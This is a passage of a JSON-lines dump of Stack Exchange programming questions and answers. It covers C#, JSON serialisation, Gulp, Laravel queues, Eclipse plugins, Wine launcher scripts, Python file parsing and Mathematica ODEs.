SOAPElement());\n}\n<\/code>\nThen loop through that second code chunk while referring to the CHANGINGVARIABLEs as the following:\n<code>soapArr[i]<\/code> or <code>soapList.get(i)<\/code>.\nI hope I'm understanding your need properly.\n","meta":{"source":"stackoverflow","title":"Naming convention using java","dup_signals":{}},"subset":"stackexchange"} +{"text":"IIS7.5 GetHostNamesPerSite using C#\n\nQuestion: <code>List<string> GetHostNamesPerSite(string SiteName)\n<\/code>\nHow can I use IIS in C# to GetHostNamesPerSite?\nComment: What do you mean? As in the site bindings?\nAnswer: If you mean get a list of all of the host header host names bound to a site:\n<code>public static List<string> GetHostNamesPerSite(string siteName)\n{\n using (ServerManager sm = new ServerManager())\n {\n Site site = sm.Sites.First(s => s.Name == siteName);\n return site.Bindings.Select(s => s.Host).ToList();\n }\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"IIS7.5 GetHostNamesPerSite using C#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Post json Object which property name has space to third party api from c#\n\nQuestion: I'm calling third party api from my asp.net mvc project. That api requires json object that has property name with space. But in c# we can't create property name with space. How Can I do that, I'm stuck?\nI have tried using JsonProperty, but It is not working. I have tried to replace string in serialize string and then send that string to api but that gives me total error.\n<code>{\n \"Single\":14000,\n \"Double\":14500,\n \"Triple\":15000,\n \"ExtraBed\":15500,\n \"ExtraChild\":16000,\n \"ExtraAdult\":16000\n}\n<\/code>\nBut instead of ExtraBed, I have to pass as 'Extra Bed'.\nComment: @dev_la , GET, POST doesn't matter . This is just about serialising\/deserialsing\nComment: Have you tryed [JsonProperty(PropertyName = \"Extra Bed\")]?\nComment: I'd use [Newtonsoft](https:\/\/www.newtonsoft.com\/json) for a clean and uncomplicated solution\nComment: What do you use for serialization?. Could you please provide more code? Looks like serialization ignore your attribute.Show how you make serialization\nComment: @BasilKosovan : yes I have tried that also\nComment: [JsonProperty(PropertyName = \"Extra Bed\")]\npublic decimal ExtraBed { get; set; }var p = new JavaScriptSerializer().Serialize(_AxisRoom);\n\n AxisRoom _hotelnew = JsonConvert.DeserializeObject(p);\nComment: @ScottyDoesKnow : I use but in get api, like in response property name is changed but this is about post api request\nComment: `JavaScriptSerializer` doesn't support renaming of properties, see [JavaScriptSerializer - custom property name](https:\/\/stackoverflow.com\/a\/32488106\/3744182).\nAnswer: <code>JsonPropertyAttribute<\/code> doesn't impact on <code>JavaScriptSerializer<\/code>. There is no attribute for <code>JavaScriptSerializer<\/code> in order to change property name.You can write a custom <code>JavaScriptConverter<\/code> for it, but I recomend just use <code>Newtonsoft<\/code>.\n<code> class AxisRoom\n {\n [JsonProperty(\"Extra Bed\")]\n public decimal ExtraBed { get; set; }\n }\n\n AxisRoom _AxisRoom = new AxisRoom { ExtraBed = 3 };\n var result = JsonConvert.SerializeObject(_AxisRoom);\n<\/code>\n<code>result<\/code> is equal to <code>{\"Extra Bed\":3.0}<\/code>\n","meta":{"source":"stackoverflow","title":"Post json Object which property name has space to third party api from c#","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generate multiple files from a single stream. Gulp\n\nQuestion: I use <code>for<\/code>, but this is not right.\n<code>gulp.task('themes', function() {\n for (var color in config.themes) {\n for (var shine in config.shines) {\n gulp.src(['src\/scss\/_config.scss'])\n .pipe(rename('_' + config.themes[color] + '-' + config.shines[shine] + '.scss'))\n .pipe(gulp.dest('src\/scss\/themes'));\n }\n }\n});\n<\/code>\nHow could I do with streams?\nAnswer: Simply use multiple pipe gulp.dest() functions:\n<code>gulp.task('themes', function() {\n for (var color in config.themes) {\n for (var shine in config.shines) {\n gulp.src(['src\/scss\/_config.scss'])\n .pipe(rename('_' + config.themes[color] + '-' + config.shines[shine] + '.scss'))\n .pipe(gulp.dest('src\/scss\/themes'));\n .pipe(gulp.dest('src\/scss\/themes2'));\n }\n }\n});'src\/scss\/themes'));\n<\/code>\n","meta":{"source":"stackoverflow","title":"Generate multiple files from a single stream. Gulp","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to clear Laravel Queue using iron.io\n\nQuestion: I'm working on TeamSpeak management system based on Laravel 4\nthe problem is when i restart the script it add the queue again unless i restart the Queue listener \nis there a way to clear the old Queue on script startup without the need to restart the queue:listen ??\nam using Iron.io service as a queue engine\nThanks in advance\n\/\/EDIT\nThanks to \"thousandsofthem\"\nit works with Laravel like this:\n<code>$queue_name = Config::get('queue.connections.iron.queue');\nQueue::getIron()->clearQueue($queue_name);\n<\/code>\nAnswer: How about touching <code>$iron_mq->clearQueue($queue_name)<\/code> ?\nhttps:\/\/github.com\/iron-io\/iron_mq_php\/blob\/master\/IronMQ.class.php#L235\nNo idea how Laravel exposes it though\nComment: finally got time to test it works like charm thanks :)\n","meta":{"source":"stackoverflow","title":"How to clear Laravel Queue using iron.io","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to install the Wolfram Workbench plugin into Eclipse Kepler or Neon?\n\nQuestion: Trying to install the Wolfram Workbench plugin into Eclipse Juno fails. How is it possible to install in into Eclipse Kepler ? Or Eclipse Neon? \nComment: @Ajasja One reason to look into this was I did not succeed to install the git plugin [EGit](http:\/\/download.eclipse.org\/egit\/updates) into the standalone version of Workbench.\nComment: @Ajasja Afaik, there have been no updates to the standalone version of Workbench. On the other hand Eclipse is actively being developed. So you can benefit from using newer Eclipse versions together with the plugin.\nComment: It is actually possible to install it in Juno, I've done it before. I didn't like Juno though so I never tested it thoroughly... it might be unstable.\nComment: So what I meant to say was, if you really want to try then I'll probably be able to remember :)\nComment: Maybe others care? For me it does not matter that much. Kepler seems to work fine.\nComment: Could somebody comment on what the benefit is of installing into Eclipse vs. using the standalone (branded) version of WB? (This is probably not a big\/interesting enough question for the main site, this is why I'm asking in the comments)\nComment: This works fine on OS X 10.8.2, thanks Rolf. But what are the advantages of this version of Eclipse for Mathematica development?\nComment: For example you don't have to work around that strange update error you ran into (it's possible, but not nice). Also I just like the look of Kepler much more. And you can install Egit and other plugins which might not install well with Indigo (the Eclipse version WWB is based on).\nAnswer: Update October 2016: As mentioned here it is officially documented how to install WWB into Eclipse Neon (64 bit)! Great! Thanx WRI.\nThis is tested on Windows and Linux:\n\nDownload and install a 32bit version of Eclipse Kepler from http:\/\/www.eclipse.org\/downloads\/\nOn Linux x86_64 make sure to have 32bit Java installed and configured, \nand, e.g. on Fedora do: yum install glibc.i686 libgcc.i686 gtk2.i686 libXtst.i686 \nStart Eclipse and go to Help\/Install New Software \nClick Add\nEnter http:\/\/download.eclipse.org\/releases\/indigo for Location, Indigo for Name\n\nClick OK and again Add and enter http:\/\/workbench.wolfram.com\/update\n\nWait a bit until you see\n\nInstall WWB core (and possibly WWB webMathematica), hit ok a couple of times\nDon't forget to eventually adjust your location of Mathematica:\n\nHere the About Eclipse box\n\nAnd here the proof that it works:\n\nOne big productivity boost for me to use Eclipse is that there \n are various vi plugins.\n One free possibility to use is vrapper , another one (non-free) is viplugin\nI also personally like this plugin which enables font-size changing by Crl++ and Ctrl+- \nComment: Maybe worth stressing that \"The workbench 2.0 plugins will install into eclipse 3.4 - 3.8, but are not\ncompatible with 4.2\" according to WRI.\nComment: This worked on OS X 10.8.2. However, the About box says 4.3.0, while the splash screen says \"Juno\" (which is 4.2)\nComment: Thanks for documenting this! Just to clarify, are you using the 3.x or the 4.x series? (It seems they're being developed in parallel at the moment. I used 3.8 for Workbench. If I understand it correctly, \"Juno\" could be either 4.2 or 3.8.)\nComment: (or even if both are not named Juno, they should have the same functionality)\nComment: @b.gatessucks As I said in a comment above, you can install the plugin in 4.x, you just have to jump through some hoops.\nComment: @sebhofer Could you please mention how to do it ? I use Fedora, which ships Eclipse 4.2; the Workbench plugin doesn't work out of the box.\nComment: @sebhofer Following your walkthrough on Win 7 I get the following error: \nAn internal error occurred during: \"FrontEnd Job::Open Notebook\".\ncom.wolfram.jlink.NativeLink.MLOpenString(Ljava\/lang\/String;[Ljava\/lang\/String;)J\nComment: @b.gatessucks I did this a while ago and unfortunately I didn't make notes :( The point is that the workbench plugin requires 3 bundles which are not included in the new release. They are listed on [the release page](http:\/\/www.eclipse.org\/eclipse\/development\/porting\/4.2\/incompatibilities.php). 1 one of them is just a dummy package which does nothing, the others can be installed if I remember correctly. I will try to remember what I did, but I don't have the time right now. I think the error messages during the install give a starting point.\nComment: @MarkusRoellig Even if you are on 64bit Windows you have to download the 32bit Eclipse version. Otherwise you get that NativeLink.MLOpenString error. Sorry, should have mentioned that earlier. Corrected now in the instructions.\nComment: What about in OS X (currently at 10.8.2): must one use the 32-bit Eclipse rather than he 64-bit version?\nComment: Although WRI lists just version 2.0 of Workbench, curiously the MacKeeper app has for some time indicated that it's out of date and that there's a version 2.1.6 available. Is the latter perhaps an internal-to-WRI version not yet released, or abandoned?\nComment: @murray I had to use the 32bit one too. The 64 bit just gave me a \"file broken\" error (or something like that).\nComment: @rm-rf Thanks so much for the clear instructions. (worked like a charm on Win7 machine). Am I correct in assuming the 32 vs 64 bit version of eclipse is really of little consequence? (it's really just whether or not eclipse itself is 32 or 64 bit, and has NO bearing on your ability to program\/compile 64 bit programs, of course assuming you have the right 64 bit JDK installed.) I believe VS2012 is still only a 32 bit program. I mention\/ask about this because I get the sense people are defaulting to a \"64 bit is better mentality\", when it really make no difference.\nComment: @telefunkenvf14 I didn't write the answer, Rolf Mertig did :)\nComment: @rm-rf - I'm always amused by these little data points about myself... Apparently my short term memory lasts about as long as this particular comment thread. :) Sooo... Thanks Rolf!\nComment: @telefunkenvf14 It does make a difference here. 32-bit Eclipse is mandatory.\nComment: @rm-rf I think something may have gotten fixed between then and now, because on Mac OS X 10.9.2 I was able to install Workbench into a 64 bit Eclipse Kepler.\nComment: With 4.x, you may have to first copy org.eclipse.core.boot and org.eclipse.update.ui jars to your eclipse\/plugins\/ folder. Get them from a 3.x release.\nComment: For Windows 7 64 bit, Java 1.7.24 64bit, I've installed eclipse 3.6.2 32bit and installed mathematica plugin as 'Rolf Mertig' described and everything is working perfect now. If you've problems with other versions of eclipse try eclipse 3.6.2\nComment: What is the difference between Wolfram Workbench and this one which can be installed on eclipse?\nComment: Great post, thank you for sharing with us. May I add the following :\n\nIf you are looking on how to install and configure 32 bit Java on a 64bit Ubuntu 14.04 (trusty) machine, read the following comment \n\nhttp:\/\/mathematica.stackexchange.com\/a\/97161\/18906\n\nif you are looking on how to configure your 32 bit java execute the following command\n\n sudo update-alternatives --config java\nComment: @RolfMertig Did you get .nb files work in Eclipse Wolfram Workbench? I extended the thread to Ubuntu 16.04 here http:\/\/askubuntu.com\/q\/766993\/25388\nComment: @Masi Yes. But Wolfram Research helped. Please contact the official Wolfram support. They are very friendly and helpful. I think a Wolfram Workbench 3 version will come to light soon. At least this has been the rumor for a couple of years.\nComment: Will the latest version of the plugin, dated 28 October 2016, work with the 64-bit version of Eclipse (Neon)? This is under macOS Sierra 10.12.1, which is of course a 64-bit OS.\nComment: @murray Yes, sure. Works fine.\nComment: @murray I've been running Neon on macOS 10.10.5 since before the conference. It is a nice upgrade. :)\n","meta":{"source":"mathematica.stackexchange","title":"How to install the Wolfram Workbench plugin into Eclipse Kepler or Neon?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to handle HRESULTs in Outlook addin?\n\nQuestion: Based on this SO answer: Catching COMException specific Error Code, I'd like to know, to properly handle COMExceptions across OSs and multiple versions of OL, if I need to only look at a specific portion of the exception. For example,\n<code>private const uint HRESULT_OPERATIONABORTED = 0x80004004;\n\n\/\/ ...\n\n try {\n \/\/ something that could throw COMExceptions\n } catch (System.Runtime.InteropServices.COMException e) {\n\n switch ((uint)e.ErrorCode) {\n\n case HRESULT_OPERATIONABORTED:\n break;\n\n default:\n break;\n }\n }\n<\/code>\nIs this sufficiently cross-platform, or is it necessary to consider only a part of the error code?\nEDIT - Just to clarify, my exact question is whether comparing <code>(uint)e.ErrorCode<\/code> to <code>0x80004004<\/code> is too specific (that is to say, whether or not I always get <code>0x80004004<\/code> for this particular error, regardless of OS\/OL), or if this is the proper way to do things.\nAnswer: You may want to also consider catching things like System.OutOfMemoryException and other exceptions that are the result of HRESULTs returned from COM objects. Not all failed HRESULTs result in COMException.\nFor most of the MAPI errors I've seen, the error codes don't vary from what's declared in the standard C MAPI header files, so I think the switch statement would be fine. In other words, that method shouldn't be any less compatible than a C-written MAPI client application.\nAnswer: You have little to fear as far as cross-platform compat goes, COM only runs on Windows. Similarly, the error code is a well defined one. You can look up the standard COM error codes in the WinError.h SDK header file. It is E_ABORT. I'd recommend you actually use that identifier.\nYou'll find this header in c:\\program files\\microsoft sdks\\windows\\v6.0\\include. It is v7.0 for VS2010.\nComment: I only meant between, say, XP and Win7. Thanks for the header, that's exactly what I needed.\n","meta":{"source":"stackoverflow","title":"How to handle HRESULTs in Outlook addin?","dup_signals":{}},"subset":"stackexchange"} +{"text":"C# Display SQL output into textbox\n\nQuestion: I am having issues trying to display the result of an SQL query into a textbox in my WPF program. My code looks like this:\n<code>private void btnCompare_Click(object sender, RoutedEventArgs e)\n {\n try\n {\n string commandText = \"SELECT ID, FirstName, LastName, Email, City FROM ( SELECT ID, FirstName, LastName, Email, City FROM CompareTable UNION ALL SELECT MainTable.ID, MainTable.FirstName, MainTable.LastName, MainTable.Email, MainTable.City FROM MainTable ) CompareTable GROUP BY ID, FirstName, LastName, Email, City HAVING COUNT(*) = 1\";\n SqlConnection conn = new SqlConnection(connectionstring);\n SqlCommand comm = new SqlCommand(commandText, conn);\n conn.Open();\n txtResult.Text = (string)comm.ExecuteScalar();\n conn.Close();\n }catch(Exception d)\n {\n MessageBox.Show(d.ToString());\n }\n \n }\n<\/code>\nWhen I run the query in the Azure DB, I get the output I'm looking for.\nBut the for some reason, the result output is an Int32 variable, this is the error I get:\n\nCan someone explain why the output is not a string?\nAnswer: <code>ExecuteScalar()<\/code> returns a single value, which is the first column of the first row if the query returns a table. So it's trying to \"cast\" the first <code>ID<\/code> from an integer to a string and fails. I suspect you want <code>ExecuteReader<\/code> instead, loop through the results, and build a string somehow.\nOr you could fill a <code>DataTable<\/code> and get the data from the rows and columns of that. There are plenty of examples out there of both methods.\nComment: Ah that makes sense, I should've done more research about that. Thanks!\n","meta":{"source":"stackoverflow","title":"C# Display SQL output into textbox","dup_signals":{}},"subset":"stackexchange"} +{"text":"Open file using custom command: how to specify the file in cmd line?\n\nQuestion: I want to open PDF using PDF-XChange Viewer through WINE. How should I specify the pdf file name in the \"custom command\" line so that I can open a PDF file using PDF-XChange Viewer by double clicking it? I tried to use the \\\"z:%f\\\" following the suggestion here for using Foxit reader. But my PDF-XChange Viewer only starts with an empty window. \n<code>wine \"c:\/Program Files\/Tracker Software\/PDF Viewer\/PDFXCview.exe\" \\\"z:%f\\\"\n<\/code>\nI use Ubuntu 10.04 and WINE 1.2.2. PDF-XChange Viewer version 2.5.\nComment: I suspect you need `\"c:\/Program\\ Files\/Tracker\\ Software\/PDF\\ Viewer\/PDFXCview.exe\"`\nComment: No, he does not, the \"\" are used for that...\nComment: Bruno Pereira is right, I could actually start PDF-XChange Viewer if I double click on a PDF file. But the file is not opened, only the program is executed. Obviously the file name is not passed successively to the PDF viewer.\nComment: Thiy this: wine \\`\"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" z:\"%f\"`\nComment: @lukasz: the backticks cause the PDF viewer fail to even start.\nAnswer: Found blog entries about the same problem for Foxit reader and for PDF-XChange Viewer. None of them worked for me. So I edited them and got one tailored for my case:\n<code>#!\/bin\/bash \nFilename=\"z:${1\/\/\\\/\/\\\\}\"\nwine \"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" $Filename\n<\/code>\nSave this bash script and open pdf using this script. Now double click pdf files will open them using PDF-XChange Viewer.\nAnswer: If the script works then you should accept that answer even though it was your own.\nWhat has worked here for other apps as far as a custom command was close to what you were trying, some small differences.\n<code>wine \"C:\\Program Files\\Tracker Software\\PDF Viewer\\PDFXCview.exe\" Z:%f\n<\/code>\nReferenced here for photoshop with add. info on altering the display name if desired for right click use - http:\/\/ubuntuforums.org\/showpost.php?p=9193687&postcount=9\nAnswer: This is based on @Flint's excellent script.\nAt first I tried <code>\"Z:\"%U<\/code> variable at the end of desktop file <code>Exec=<\/code> field for Wine programs. It worked fine until I opened a program without a file specified. Wine programs complained about missing file because the <code>Exec=<\/code> line pointed to the drive Z: which clearly is not a file but absolute file path instead. <code>File not found: Z:<\/code> or similar messages popped up in a Wine program. Bit annoying.\nProblem with <code>\"Z:\"%U<\/code> is that it's not a conditional variable if Z: is used there. However, Wine absolutely requires Z: because it can't find correct file paths otherwise.\nYour script makes the whole <code>\"Z:\"%U<\/code> thing a conditional clause. The script does the job exactly as I've wished for.\nHowever, the script should consider all exe files written in uppercase, too. By now, it can't point any MS Office files (docx, pptx...) to MS Office 2010 because all program executables are written like <code>WINWORD.EXE<\/code> or <code>POWERPNT.EXE<\/code>. Of course executables could be renamed in lower case but I prefer more universal solution rather than renaming single exe's for every program.\nDirty and universal solution is to modify the script code like:\n<code>#!\/bin\/bash\n\nallargs=(\"$@\")\n\nfixpath=0\nfor idx in \"${!allargs[@]}\"; do\n arg=\"${allargs[$idx]}\"\n\n if [[ $fixpath -eq 0 ]]; then\n # fix file paths only after the first executable is found in arg\n if [[ \"$arg\" == *.exe ]]; then\n fixpath=1\n fi\n if [[ \"$arg\" == *.EXE ]]; then\n fixpath=1\n fi\n continue\n elif [[ $fixpath -eq 1 ]]; then\n # if arg starts with '\/' and it's a path that exists on host\n # precede the path with drive 'Z:'\n if [[ \"${arg:0:1}\" == '\/' && -e \"$arg\" ]]; then\n allargs[$idx]=\"z:${arg\/\/\\\/\/\\\\}\"\n fi\n fi\ndone\n\nexec env \"${allargs[@]}\"\n<\/code>\nThe <code>or<\/code> operator did not work for some reason. I'm sure there is a more elegant way to achieve same result, anyway.\nAnswer: If that program already installed using wine then I dont think it needs absolute path. I think only \n<code> wine pdfxcview filename\n<\/code>\nwill open the file.\nOkay may be my reply is stupid. What actually you are trying to do ? are you trying to fix the program launch error ?\nComment: No, I did not have problem starting the pdf viewer. \n\nI guess I did not state the question clearly (I have revised the question now). I want to know how to specify input files in \"custom command\" s.t. when I double click a file it will be opened by pdfxcview.\nAnswer: I realize this is old question but I want to share my solution which I figured after having started using PDFXchangeEditor (successor to PDFXchangeViewer) then bumped into issue to make it accepts multiple input files from host os. First of all, the accepted answer and all other answers which have been posted assume that the program will only handle a single file. You can actually throw multiple file args at once to it and it will open them all fine, with a little trick.\nThe trick is using <code>%F<\/code> code expansion in <code>Exec<\/code> field in the app's .desktop launcher and preceed all the expanded local file args in the field with <code>Z:<\/code> which can be done with the following script\nCall it <code>wine-env<\/code>. This goes in <code>\/usr\/local\/bin<\/code> and be sure to give it <code>chmod +x<\/code>\n<code>#!\/bin\/bash\n\nallargs=(\"$@\")\n\nfixpath=0\nfor idx in \"${!allargs[@]}\"; do\n arg=\"${allargs[$idx]}\"\n\n if [[ $fixpath -eq 0 ]]; then\n # fix file paths only after the first executable is found in arg\n if [[ \"$arg\" == *.exe ]]; then\n fixpath=1\n fi\n continue\n elif [[ $fixpath -eq 1 ]]; then\n # if arg starts with '\/' and it's a path that exists on host\n # precede the path with drive 'Z:'\n if [[ \"${arg:0:1}\" == '\/' && -e \"$arg\" ]]; then\n allargs[$idx]=\"Z:$arg\"\n fi\n fi\ndone\n\nexec env \"${allargs[@]}\"\n<\/code>\nAnd for the app's .desktop file, call it <code>pdfxce.desktop<\/code> and put it in <code>~\/.local\/share\/applications\/<\/code> and its content should look like this\n<code>[Desktop Entry]\nName=PDF-XChange Editor\nType=Application\nTerminal=false\nExec=wine-env WINEDEBUG=-all WINEPREFIX=\/home\/<user>\/.local\/share\/bottles\/pdfxce wine PDFXEdit.exe %F\nIcon=\/home\/<user>\/.local\/share\/icons\/bottles\/pdfxce-pdfxedit.png\nPath=\/home\/<user>\/.local\/share\/bottles\/pdfxce\/drive_c\/Program Files\/Tracker Software\/PDF Editor\nStartupNotify=true\nStartupWMClass=PDFXEdit.exe\n<\/code>\nYou need to change the part with your own username. I keep all of my wineprefixes dirs in a folder called \"bottles\". You may have your own way to organize your wineprefixes so change all the parts that contain \"bottles\" accordingly\nAnd last step, assign PDF files to the app as per normal (Right click on pdf -> <code>Properties<\/code> -> <code>Open With<\/code> tab)\nReference: Freedesktop's desktop entry specification\nAnswer: I followed this link to install 32 bit PDF XChange viewer in Ubuntu 64 Bit 14.04\nThen the link shows a script to open the PDF Xchange viewer with the file-name as argument. I made that script and kept that in <code>\/bin<\/code>\nThen I edited the <code>~\/.local\/share\/applications\/wine-extension-pdf.desktop<\/code> to this:\n<code>[Desktop Entry]\nType=Application\nName=PDF-XChangeViewer\nMimeType=application\/pdf;\nExec=PDFXCview %f\nNoDisplay=true\nStartupNotify=true\n<\/code>\nMy script was named <code>PDFXCview<\/code>\n","meta":{"source":"askubuntu","title":"Open file using custom command: how to specify the file in cmd line?","dup_signals":{}},"subset":"stackexchange"} +{"text":"making list of white space separated numbers from a file\n\nQuestion: I want to read some numbers from a file which are, which I am unable to read in two lists for further calculation like Mean and STDEV.\n 0.0000000 0.0000005\n 0.0100000 0.1675796\n 0.0200000 0.2042502\n 0.0300000 0.2064999\n 0.0400000 0.2237432\n 0.0500000 0.2245723\n 0.0600000 0.2365732\n 0.0700000 0.2433299\n 0.0800000 0.2556339\n 0.0900000 0.2569953\n 0.1000000 0.2658122\n 0.1100000 0.2718526\n 0.1200000 0.2741648\n<code>import os \n\ndirectory= \"\/media\/quinn\/Joker\/post_analysis\/KBH00\"\n\nfor x in range (252, 256):\n os.chdir(directory + str(x) +'\/')\n print(os.getcwd())\n with open ('rmsd.xvg', 'r') as rmsd:\n line_19_to_end = rmsd.readlines()[18:]\n print(\"Values of RMSD are:\")\n for line in line_19_to_end:\n print(\"%s\" %(line))\n<\/code>\nComment: us can use `line_19_to_end = list(map(float, line_19_to_end.split()))`\nComment: The problem is my data is in two columns and I can't use split in that condition.\nComment: Why can't you use split? Can you show the structure of the data in your file, if it isn't simply two space-separated floats per line?\nAnswer: When you are iterating add all values at the 0th position to a new list <code>col1<\/code> and 1st position to another list <code>col2<\/code>, after conferring each values to float. \n<code>import os \n\ndirectory= \"\/media\/quinn\/Joker\/post_analysis\/KBH00\"\n\nfor x in range (252, 256):\n os.chdir(directory + str(x) +'\/')\n print(os.getcwd())\n col1,col2=[],[]\n with open ('rmsd.xvg', 'r') as rmsd:\n line_19_to_end = rmsd.readlines()[18:]\n print(\"Values of RMSD are:\")\n for line in line_19_to_end:\n print(\"%s\" %(line))\n line = list(map(float, line.split()))\n col1.append(line[0])\n col2.append(line[1])\nprint(col1,'\\n',col2)\n<\/code>\n","meta":{"source":"stackoverflow","title":"making list of white space separated numbers from a file","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to install SimpleCV on mac OS 10.8.1\n\nQuestion: So I have been trying to install SimpleCV for some time now. I was finally able to install pygame, but now I have ran into a new error. I have used pip, easy_install, and cloned the SimpleCV github repository to try to install SimpleCV, but I get this error from all:\n<code> ImportError: No module named scipy.ndimage\n<\/code>\nIf it is helpful, this is the whole error message:\n<code> Traceback (most recent call last):\n File \"\/usr\/local\/bin\/simplecv\", line 8, in <module>\n load_entry_point('SimpleCV==1.3', 'console_scripts', 'simplecv')()\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resource s.py\", line 318, in load_entry_point\n return get_distribution(dist).load_entry_point(group, name)\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resources.py\", line 2221, in load_entry_point\nreturn ep.load()\n File\"\/System\/Library\/Frameworks\/Python.framework\/Versions\/2.7\/Extras\/lib\/python\/pkg_resources.py\", line 1954, in load\n entry = __import__(self.module_name, globals(),globals(), ['__name__'])\n File \"\/Library\/Python\/2.7\/site-packages\/SimpleCV\/__init__.py\", line 3, in <module>\n from SimpleCV.base import *\n File \"\/Library\/Python\/2.7\/site-packages\/SimpleCV\/base.py\", line 22, in <module>\nimport scipy.ndimage as ndimage\n ImportError: No module named scipy.ndimage\n<\/code>\nI am sorry if there is a simple solution to this, I have been trying and searching for solutions for well over an hour with no luck. \nAnswer: You need to have SciPy installed to use SimpleCV.\nTake a look on this site: http:\/\/penandpants.com\/2012\/02\/24\/install-python\/\nYou may also need to install opencv, you can use homebrew for that.\nAnswer: On osx 10.9 I did\n<code>sudo pip install scipy\n<\/code>\nIt worked.\n","meta":{"source":"stackoverflow","title":"How to install SimpleCV on mac OS 10.8.1","dup_signals":{}},"subset":"stackexchange"} +{"text":"Dynamical System\n\nQuestion: I'm Trying to solve dynamical system in friedmann universe. But, I have problems with initial conditions to $\\Omega_{\\Lambda}$ and $\\Omega_{k}$. The code that i'm implementing is\n<code>ode1[x0_, y0_] := NDSolve[{x'[n]] == 2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) x[n], y'[n] == 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/ 2 x[n]) y[n], x0] == x0, y[0] == y0}, {x[n], y[n]}, {n, -0.7, 0.54}, MaxSteps -> Infinity]\n<\/code>\nWhere $\\gamma=1$, $n=\\ln a$, $x=\\Omega_{\\Lambda}$ and .$y=\\Omega_{k}$ For example, I try\n<code>sol[1] = ode1[-0.5, 1.5]; sol[2] = ode1[1, 0]; sol[3] = ode1[0, 1]; sol[4] = ode1[0.8, 0.2]; sol[5] = ode1[-0.3, 1.3]; sol[6] = ode1[1.3,-0.3]; sol[7] = ode1[1.2, -0.2]; sol[8] = ode1[0.2, 0.8];\n\nParametricPlot[Evaluate[Table[{x[n], y[n]} \/. sol[i], {i,8}]], {n, -0.7, 0.54}, PlotStyle -> {Thick}, PlotRange -> {{-0.5, 1.5}, {-0.5, 1}}, PlotPoints -> 100, AxesLabel -> {\"x\", \"y\"}, Axes -> True]\n<\/code>\nThe plot shows anything. \nAnswer: Use code\n<code>ode1[x0_, y0_] := \n NDSolve[{x'[n] == \n 2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) x[n],\n y'[n] == \n 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) y[n], \n x[0] == x0, y[0] == y0} \/. \\[Gamma] -> 1, {x, y}, {n, -0.7, 0.54},\n MaxSteps -> Infinity]\nsol[1] = ode1[-0.5, 1.5]; sol[2] = ode1[1, 0]; sol[3] = ode1[0, 1]; \nsol[4] = ode1[0.8, 0.2]; sol[5] = ode1[-0.3, 1.3]; \nsol[6] = ode1[1.3, -0.3]; sol[7] = ode1[1.2, -0.2]; \nsol[8] = ode1[0.2, 0.8];\n\nParametricPlot[\n Evaluate[Table[{x[n], y[n]} \/. sol[i], {i, 8}]], {n, -0.7, 0.54}, \n PlotStyle -> {Thick}, PlotRange -> All, PlotPoints -> 100, \n AxesLabel -> {\"x\", \"y\"}, Axes -> True]\n<\/code>\n\nPhase space of the system \n<code>reg = ImplicitRegion[\n 1 - x - y < 0 && -.5 <= x <= 1.5 && -1 <= y <= 1, {x, y}]; reg1 = \n ImplicitRegion[\n 1 - x - y > 0 && -.5 <= x <= 1.5 && -1 <= y <= 1, {x, y}];\n\nsp = StreamPlot[{2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/\n 2 x[n]) x[n], \n 2 ((3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/2 x[n]) y[\n n]} \/. \\[Gamma] -> 1, {x[n], y[n]} \\[Element] reg1, \n FrameLabel -> {Subscript[\\[CapitalOmega], \\[CapitalLambda]], \n Subscript[\\[CapitalOmega], K]}, StreamPoints -> Fine]\n\nrp = Show[RegionPlot[reg, BoundaryStyle -> None], \n Graphics[{Black, Circle[{0, 0}, 2], \n Inset[\\[CapitalOmega] < 0, {1, 0.5}]}]]\nShow[sp, rp]\n\nsp1 = StreamPlot[{2 (1 + (3 \\[Gamma] - 2)\/2 (1 - y[n]) - (3 \\[Gamma])\/\n 2 x[n]) x[n], 1 - x[n] - y[n]} \/. \\[Gamma] -> 1, {x[n], -.5, \n 1.5}, {y[n], 0., 2}, \n FrameLabel -> {Subscript[\\[CapitalOmega], \\[CapitalLambda]], \\\n\\[CapitalOmega]}, StreamPoints -> Fine]\n<\/code>\nComment: Thanks for your answer, the problem is that I want to reproduce the figure 2 [link] (http:\/\/arxiv.org\/abs\/physics\/0108066v1) in page 13.\nComment: @Fisjog Show how to do it?\nComment: thanks a lot! @alex-trounev\n","meta":{"source":"mathematica.stackexchange","title":"Dynamical System","dup_signals":{}},"subset":"stackexchange"} +{"text":"WPF: Datagrid - Apply DataGridTemplateColumn.CellTemplate dynamically\n\nQuestion: I am quite new to WPF (from Winforms). I am using .Net 4.5 and the default DataGrid that comes along with the framework in WPF. The columns are created dynamically because I do not know at compile time. Now, based on data some columns will be read-only and some will be of ComboBox type.\n\nHow can I apply this logic dynamically while creating the columns dynamically as shown below. here is the code which I wrote so far. Whenever the data changes, the columns are generated dynamically based on the data.\nAlso, how do I generate \"different types\" of column dynamically (ComboBox, TextBox, etc...) based on data. The MVVM-ish way in WPF is kind of restricting me because I do not have much knowledge about templating. I am sure it should be easy once I get through.\n\nNB: Currently all this is working fine. I have a read-only databound grid. But, there is no support for selective editable columns and selective ComboBox columns.\n<code>public class DatagridExtension {\n \n public static readonly DependencyProperty RefDataSourceProperty =\n DependencyProperty.RegisterAttached(\n \"RefDataSource\",\n typeof(RefDataRecord),\n typeof(DatagridExtension),\n new PropertyMetadata( default(RefDataRecord), OnRefDataSourceChanged)\n );\n\n private static void OnRefDataSourceChanged(DependencyObject 